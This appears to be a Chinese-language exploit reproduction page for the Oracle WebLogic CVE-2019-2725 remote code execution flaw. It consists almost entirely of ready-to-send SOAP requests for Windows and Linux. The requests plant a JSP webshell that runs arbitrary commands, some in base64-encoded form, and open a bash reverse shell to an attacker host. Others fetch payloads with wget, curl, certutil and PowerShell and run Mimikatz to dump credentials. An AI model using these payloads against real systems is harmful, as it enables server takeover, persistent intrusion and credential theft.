跳转至

(CVE-2019-2725)(CNVD-C-2019-48814)

一、漏洞简介

二、漏洞影响

Oracle WebLogic Server 10.x

Oracle WebLogic Server 12.1.3

三、复现过程

访问http://www.0-sec.org/_async/AsyncResponseService

若出现以上情况,则有可能会存在漏洞。

Win/Linux 通用写入shell代码(一)

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1142
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string><void method="println"><string><![CDATA[
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
    %>]]>
</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

执行完之后访问

http://www.0-sec.org/_async/webshell.jsp?pwd=123&cmd=whoami

Win/Linux 通用写入shell代码(二)

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1136
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string><void method="println"><string><![CDATA[
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
    %>]]>
</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

执行完之后访问

http://www.0-sec.org/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

(注:上述报文中servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/,servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/ 均为默认路径,如果路径修改,可以配合反弹shell进行获取)

Linux

  • 反弹shell

```{=html}

    POST /_async/AsyncResponseService HTTP/1.1
    Host: ip:port
    Content-Length: 853
    Accept-Encoding: gzip, deflate
    SOAPAction:
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
    <soapenv:Header> 
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&gt;&amp;1</string>
    </void>
    </array>
    <void method="start"/></void>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body></soapenv:Envelope>

-   写入webshell(需要公网) //这里提供两个代码

> 需要自己在公网上放置一个webshell.txt
>
> webshell地址:<http://www.0-sec.org/_async/webshell.jsp>

    POST /_async/AsyncResponseService HTTP/1.1
    Host: ip:port
    Content-Length: 789
    Accept-Encoding: gzip, deflate
    SOAPAction:
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
    <soapenv:Header> 
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
    </void>
    </array>
    <void method="start"/></void>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body></soapenv:Envelope>
    POST /_async/AsyncResponseService HTTP/1.1
    Host: ip:port
    Content-Length: 789
    Accept-Encoding: gzip, deflate
    SOAPAction:
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
    <soapenv:Header> 
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
    </void>
    </array>
    <void method="start"/></void>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body></soapenv:Envelope>

-   写入webshell(无需公网) //这里提供两个代码

```{=html}
<!-- -->
POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.50.219:7001 Content-Length: 1378 Accept-Encoding: gzip, deflate SOAPAction: Accept: / User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;/bin/bash&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;-c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d &gt; servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;

写入的webshell地址为:http://www/0-sec.org/_async/webshell.jsp?pwd=123&cmd=whoami

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.50.219:7001
Content-Length: 1376
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;/bin/bash&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;-c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d &gt; servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;

写入的webshell地址为:http://www.0-sec.org/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

Win

  • 反弹shell

可直接使用CobaltStrike生成一个payload.ps1 powershell脚本,将该脚本放到公网上,然后使用如下报文即可

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;cmd&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;/c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;
  • 写入webshell(需要公网) //这里提供两个代码

需要自己在公网上放置一个webshell.txt

webshell地址为:http://www.0-sec.org/_async/webshell.jsp

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;cmd&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;/c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;cmd&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;/c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;certutil -urlcache -split -f http://ip:port/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;
  • 写入webshell (无需公网) //这里提供四个代码

前两组代码

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;cmd&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;/c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4=  &gt; servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.txt&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;cmd&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;/c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;certutil -decode servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.txt servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\webshell.jsp&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;

这两组代码的webshell地址为:http://www.0-sec.org/_async/webshell.jsp?pwd=123&cmd=whoami

后两组代码

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 1367
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;cmd&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;/c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4=  &gt; servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;
POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 913
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"&gt;   
&lt;soapenv:Header&gt; 
&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;
&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;
&lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
&lt;void class="java.lang.ProcessBuilder"&gt;
&lt;array class="java.lang.String" length="3"&gt;
&lt;void index="0"&gt;
&lt;string&gt;cmd&lt;/string&gt;
&lt;/void&gt;
&lt;void index="1"&gt;
&lt;string&gt;/c&lt;/string&gt;
&lt;/void&gt;
&lt;void index="2"&gt;
&lt;string&gt;certutil -decode servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp&lt;/string&gt;
&lt;/void&gt;
&lt;/array&gt;
&lt;void method="start"/&gt;&lt;/void&gt;
&lt;/work:WorkContext&gt;
&lt;/soapenv:Header&gt;
&lt;soapenv:Body&gt;
&lt;asy:onAsyncDelivery/&gt;
&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;

这两组代码的webshell地址为:http://www.0-sec.org/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

自动化脚本

https://github.com/ianxtianxt/CVE-2019-2725

cve2019-2725_weblogic_rce.bat http://192.168.31.5:7001 "cat /etc/passwd"

参考链接

https://mp.weixin.qq.com/s?__biz=MzA3NjU5MTIxMg==&mid=2650560530&idx=1&sn=86f5e0811c003c71965a4fc088f18100&chksm=87560111b02188071b9a60a36316b931770b0ed58b02b63d2d2428a5120d6809030d94031589&scene=21#wechat_redirect